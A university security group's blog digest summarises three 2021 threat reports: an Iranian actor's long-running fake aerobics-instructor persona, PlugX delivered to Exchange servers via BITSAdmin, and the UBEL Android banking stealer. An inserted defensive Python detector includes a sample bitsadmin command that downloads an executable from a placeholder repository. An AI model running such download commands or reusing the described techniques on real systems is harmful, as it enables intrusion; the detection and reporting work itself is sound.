Cyber Security News — Past 24 hours | 28.07.2021

SLIIT CS2 · 3 min read · Jul 28, 2021

Hackers Posed as Aerobics Instructors for Years to Target Aerospace Employees

Enterprise security firm Proofpoint attributed the covert operation to a state-aligned threat actor it tracks as TA456, which the wider cybersecurity community knows under the monikers Tortoiseshell and Imperial Kitten.


«Using the social media persona 'Marcella Flores,' TA456 built a relationship across corporate and personal communication platforms with an employee of a small subsidiary of an aerospace defense contractor,» Proofpoint said in a report shared with The Hacker News. «In early June 2021, the threat actor attempted to capitalize on this relationship by sending the target malware via an ongoing email communication chain».


Facebook has suspended the Flores account from its platform in a coordinated takedown of users linked to Iranian hacker activity. «TA456 demonstrated a significant operational investment by cultivating a relationship with a target's employee over years in order to deploy LEMPO to conduct reconnaissance into a highly secured target environment within the defense industrial base,» Proofpoint researchers said. «This campaign exemplifies the persistent nature of certain state aligned threats and the human engagement they are willing to conduct in support of espionage operations».

Source — https://thehackernews.com/2021/07/hackers-posed-as-aerobics-instructors.html

Chinese Hackers Implant PlugX Variant on Compromised MS Exchange Servers

Dating back to as early as 2008, PlugX is a fully-featured second-stage implant with capabilities such as file upload, download, and modification, keystroke logging, webcam control, and access to a remote command shell.


«New features were observed in this variant, including enhanced payload-delivery mechanisms and abuse of trusted binaries».


PKPLUG now joins the list, according to Unit 42, who found the attackers bypassing antivirus detection mechanisms to target Microsoft Exchange servers by leveraging legitimate executables such as BITSAdmin to retrieve a seemingly innocuous file from an actor-controlled GitHub repository. The file, which houses the encrypted and compressed PlugX payload, alludes to a freely available advanced repair and optimization tool that’s designed to clean up and fix issues in the Windows Registry.
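The BITSAdmin technique above is what a defender would hunt for in process-creation telemetry. The following is an added example, not code from the article or from Unit 42: it scores constructed Sysmon-style events (Image, ParentImage, CommandLine) and flags bitsadmin.exe transfers whose URL host is outside a hypothetical allowlist, plus transfers whose parent is the IIS worker process w3wp.exe, which is assumed here to be abnormal on an Exchange server.

```python
import re
from urllib.parse import urlparse

# Hosts a BITS job is expected to contact in this (hypothetical) environment.
ALLOWED_HOSTS = {"wsus.corp.example", "download.windowsupdate.com"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def score_event(event):
    """Return the reasons an event looks like BITSAdmin download abuse ([] = not flagged)."""
    reasons = []
    if not event.get("Image", "").lower().endswith("\\bitsadmin.exe"):
        return reasons
    cmd = event.get("CommandLine", "")
    lowered = cmd.lower()
    # /transfer and /addfile are the bitsadmin switches that take a remote URL.
    if "/transfer" in lowered or "/addfile" in lowered:
        for url in URL_RE.findall(cmd):
            host = (urlparse(url).hostname or "").lower()
            if host not in ALLOWED_HOSTS:
                reasons.append(f"download from non-allowlisted host {host}")
    # Assumption: the IIS worker process (w3wp.exe) hosting Exchange should never
    # be the parent of a BITS transfer; administrators run bitsadmin interactively.
    if event.get("ParentImage", "").lower().endswith("\\w3wp.exe"):
        reasons.append("spawned by IIS worker process w3wp.exe")
    return reasons


def triage(events):
    """Return [(EventId, reasons)] for every flagged event, in input order."""
    flagged = []
    for event in events:
        reasons = score_event(event)
        if reasons:
            flagged.append((event["EventId"], reasons))
    return flagged


# Constructed sample events (not real telemetry); the GitHub path is a placeholder.
SAMPLE_EVENTS = [
    {"EventId": 1, "Image": r"C:\Windows\System32\bitsadmin.exe",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "CommandLine": r"bitsadmin /transfer job /download /priority high https://github.com/PLACEHOLDER/repo/raw/main/tool.exe C:\ProgramData\tool.exe"},
    {"EventId": 2, "Image": r"C:\Windows\System32\bitsadmin.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"bitsadmin /transfer patch https://wsus.corp.example/kb.msu C:\Temp\kb.msu"},
]

if __name__ == "__main__":
    for event_id, reasons in triage(SAMPLE_EVENTS):
        print(event_id, "; ".join(reasons))
```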

Source — https://thehackernews.com/2021/07/chinese-hackers-implant-plugx-variant.html

UBEL is the New Oscorp — Android Credential Stealing Malware Active in the Wild

Italy’s CERT-AGID, in late January, disclosed details about Oscorp, a mobile malware developed to attack multiple financial targets with the goal of stealing funds from unsuspecting victims.


«By analyzing some related samples, we found multiple indicators linking Oscorp and UBEL to the same malicious codebase, suggesting a fork of the same original project or just a rebrand by other affiliates, as its source-code appears to be shared between multiple ,» Italian cybersecurity company Cleafy said Tuesday, charting the malware’s evolution.


Once downloaded onto the device, the malware attempts to install itself as a service and hide its presence from the target, thereby achieving persistence for extended periods of time. Interestingly, the use of WebRTC to interact with the compromised Android phone in real time circumvents the need to enroll a new device and take over an account to perform fraudulent activities. «The main goal for this by using this feature, is to avoid a ‘new device enrollment’, thus drastically reducing the possibility of being flagged ‘as suspicious’ since device’s fingerprinting indicators are well-known from the bank’s perspective,» the researchers said.

Source — https://thehackernews.com/2021/07/ubel-is-new-oscorp-android-credential.html

Stay Focused. Stay Vigilant.

Cyber Threat Incident Management Team — Cyber Security Community @ SLIIT
